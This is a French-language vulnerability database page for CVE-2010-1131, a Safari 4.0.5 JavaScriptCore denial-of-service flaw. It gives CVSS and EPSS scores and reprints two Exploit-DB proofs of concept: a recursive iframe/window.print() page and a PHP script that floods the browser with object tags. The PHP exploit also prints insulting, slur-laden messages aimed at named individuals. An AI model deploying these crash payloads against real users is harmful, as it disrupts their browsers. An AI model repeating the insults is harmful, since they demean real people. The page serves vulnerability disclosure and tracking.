CVE-2010-1131 : Détail

CVE-2010-1131

3.83%V4
Network
2010-03-26
21h00 +00:00
2024-09-16
18h28 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the substring.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 12487

Date de publication : 2010-05-02 22h00 +00:00
Auteur : Mathias Karlsson
EDB Vérifié : No

<html> <--------------------- Crash Report Problem Event Name: APPCRASH Application Name: Safari.exe Application Version: 5.31.22.7 Application Timestamp: 4b8f94fa Fault Module Name: JavaScriptCore.dll Fault Module Version: 5.31.22.5 Fault Module Timestamp: 4b8cb88c Exception Code: c00000fd Exception Offset: 000889f7 OS Version: 6.1.7600.2.0.0.256.48 Locale ID: 1053 Additional Information 1: d4bb Additional Information 2: d4bb5342a8501f1ef1ad79845414ed25 Additional Information 3: 57f4 Additional Information 4: 57f4717a3dd18c61a213b49009cb5bb7 Tested on: Microsoft Windows 7 By: Mathias Karlsson URL: http://h.ackack.net/ Note: If you set the iframe src property to an external document containing the window.print(), the user does not have to press away the first print popup. ----------------------> <script> window.print(); a(); function a() { setInterval(b,0); } function b() { var c = document.createElement("iframe"); c.setAttribute("src",document.location); document.getElementsByTagName("body")[0].appendChild(c); setInterval(a,0); } </script> </html>
Exploit Database EDB-ID : 11838

Date de publication : 2010-03-21 23h00 +00:00
Auteur : 3lkt3F0k4
EDB Vérifié : Yes

<?php /*************************************************************************** [TITLE]: SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash) [OS]: WINDOWS XP SP3 [DOWNLOAD]: http://www.apple.com/es/safari/download/ [AUTHOR]: 3lkt3F0k4 [CONTACT]: 3lkt3F0k4[i_love_spam]gmail[i_love_spam]com -------------------------CRASH DUMP SNIP------------------------------------ Executable search path is: Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: SingleUserTS Machine Name: Debug session time: Sun Mar 21 23:34:38.000 2010 (GMT+1) System Uptime: not available Process Uptime: 0 days 0:01:54.000 ................................................................ This dump file has an exception of interest stored in it. The stored exception information can be accessed via .ecxr. (d94.d98): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=01417ea0 edx=0000000a esi=00011ae2 edi=7ff90240 eip=0137b267 esp=00128c50 ebp=00000000 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for JavaScriptCore.dll - JavaScriptCore!JSC::CString::~CString+0x40d7: 0137b267 c705efbeadbb00000000 mov dword ptr ds:[0BBADBEEFh],0 ds:0023:bbadbeef=???????? -------------------------CRASH DUMP SNIP------------------------------------ ***************************************************************************/ $fuzz=str_repeat("<object>",10000); echo "<title>SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)</title>"; echo "<center><b><font color='#ff0000'>Wait please...Crash is coming...</font><br><br><br>"; echo "Spanish message for my friends:<br>"; echo "0wn3Dsss!!<br>"; echo "TiTo MC es un negro cabron que rapea como el puto culo.<br>"; echo "Chema Alonso a.k.a. maligno a.k.a. neo payaso MS.<br>"; echo "Eres vergonzoso, penoso, lamo, n44b, l3l,...<br>"; echo "Tus reflexiones son tristes y pobres, vas a comision? das pena chaval!<br>"; echo "Putos focaaaas!<br><br>"; echo "Greetz to my team: Spanishiit Team. Welcome everyone!<br>"; echo "We'll come back fucking more people...Sure!<br><br><br>"; echo "<hr width='80%' />"; echo "<font color='#ff0000'>I <3 Rooted CON 2010. Next year more! (shhhhhh)</font></center>"; echo $fuzz; ?>

Products Mentioned

Configuraton 0

Apple>>Safari >> Version 4.0.5

Microsoft>>Windows_xp >> Version *

Références

http://www.securityfocus.com/bid/38884
Tags : vdb-entry, x_refsource_BID